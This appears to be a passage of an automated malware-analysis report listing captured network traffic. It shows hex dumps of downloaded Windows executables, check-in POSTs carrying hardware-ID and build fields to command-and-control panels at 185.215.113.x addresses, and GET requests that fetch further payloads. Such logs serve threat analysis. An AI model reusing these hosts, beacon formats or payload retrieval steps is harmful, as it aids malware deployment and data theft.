Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:25 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:32 GMTContent-Type: application/octet-streamContent-Length: 1934848Last-Modified: Thu, 24 Oct 2024 17:07:23 GMTConnection: keep-aliveETag: "671a7ecb-1d8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 80 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4c 00 00 04 00 00 b6 c5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 6a 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6a 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 70 62 77 79 6e 69 72 00 70 1a 00 00 00 32 00 00 6c 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 78 64 63 73 75 63 6b 00 10 00 00 00 70 4c 00 00 04 00 00 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 4c 00 00 22 00 00 00 64 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:40 GMTContent-Type: application/octet-streamContent-Length: 1852928Last-Modified: Thu, 24 Oct 2024 17:07:16 GMTConnection: keep-aliveETag: "671a7ec4-1c4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 55 88 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 66 6e 67 63 63 67 65 00 f0 19 00 00 f0 4f 00 00 e4 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 74 6d 6d 79 65 79 6c 00 10 00 00 00 e0 69 00 00 04 00 00 00 20 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 24 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:42 GMTContent-Type: application/octet-streamContent-Length: 2780160Last-Modified: Thu, 24 Oct 2024 16:45:44 GMTConnection: keep-aliveETag: "671a79b8-2a6c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 b8 bc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 65 6b 71 65 6c 6c 78 00 20 2a 00 00 a0 00 00 00 0c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 74 76 6e 6b 75 64 67 00 20 00 00 00 c0 2a 00 00 04 00 00 00 46 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 4a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:42 GMTContent-Type: application/octet-streamContent-Length: 2780160Last-Modified: Thu, 24 Oct 2024 16:45:44 GMTConnection: keep-aliveETag: "671a79b8-2a6c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 b8 bc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 65 6b 71 65 6c 6c 78 00 20 2a 00 00 a0 00 00 00 0c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 74 76 6e 6b 75 64 67 00 20 00 00 00 c0 2a 00 00 04 00 00 00 46 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 4a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:30:42 GMTContent-Type: application/octet-streamContent-Length: 2780160Last-Modified: Thu, 24 Oct 2024 16:45:44 GMTConnection: keep-aliveETag: "671a79b8-2a6c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 b8 bc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 65 6b 71 65 6c 6c 78 00 20 2a 00 00 a0 00 00 00 0c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 74 76 6e 6b 75 64 67 00 20 00 00 00 c0 2a 00 00 04 00 00 00 46 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 4a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 38 35 38 38 44 45 43 36 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="hwid"A48588DEC639786254513------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="build"doma------EHDHDHIECGCAEBFIIDHI--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001242001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001243001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJEHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 38 35 38 38 44 45 43 36 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 